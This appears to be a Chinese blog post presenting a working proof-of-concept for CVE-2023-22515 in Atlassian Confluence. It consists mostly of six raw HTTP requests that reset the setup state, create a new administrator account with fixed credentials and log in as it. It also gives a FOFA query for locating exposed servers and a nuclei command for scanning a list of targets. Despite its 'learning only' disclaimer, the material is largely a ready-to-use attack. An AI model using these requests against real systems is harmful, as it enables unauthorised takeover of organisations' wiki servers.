免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Atlassian Confluence是企业广泛使用的wiki系统。
2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。
fofa:app=“ATLASSIAN-Confluence”
我不知道网上的3个POC就能成功是怎么来的,但是我亲测,根本不行
下面上真实可行的
POC1:
GET /setup/setupadministrator-start.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
POC2:
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2Xc2rpUfLGuc1EKqJouRSWI94Wl HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Cookie: JSESSIONID=1962746C401654F1C9EA4A6C3DDA2436
Accept-Encoding: gzip, deflate
POC3:
GET /setup/setupadministrator-start.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Cookie: JSESSIONID=1962746C401654F1C9EA4A6C3DDA2436
Accept-Encoding: gzip, deflate
POC4:
```csharp
POST /setup/setupadministrator.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 128
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=1962746C401654F1C9EA4A6C3DDA2436
X-Atlassian-Token: no-check
Accept-Encoding: gzip, deflate
username=duirzzohm7&fullName=admin&email=DuirZZohM7@JPaUY5kHTc.com&password=JPaUY5kHTc&confirm=JPaUY5kHTc&setup-next-button=Next
POC5:
POST /dologin.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 89
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=896D0568141AE152F06EEB4CFBF79211; seraph.confluence=31228104%3A5f386933f77f200a19ab411064417b393386d2ec
X-Atlassian-Token: no-check
Accept-Encoding: gzip, deflate
os_username=duirzzohm7&os_password=JPaUY5kHTc&login=Log+in&os_destination=%2Findex.action
POC6:
GET /welcome.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Cookie: JSESSIONID=896D0568141AE152F06EEB4CFBF79211; seraph.confluence=31228104%3A5f386933f77f200a19ab411064417b393386d2ec
Accept-Encoding: gzip, deflate
成功登录结果如图
我这里开了代理,不要可以去掉
nuclei.exe -t /http/cves/2023/CVE-2023-22515.yaml -l test104.txt -proxy http://127.0.0.1:8080 -stats
结果如图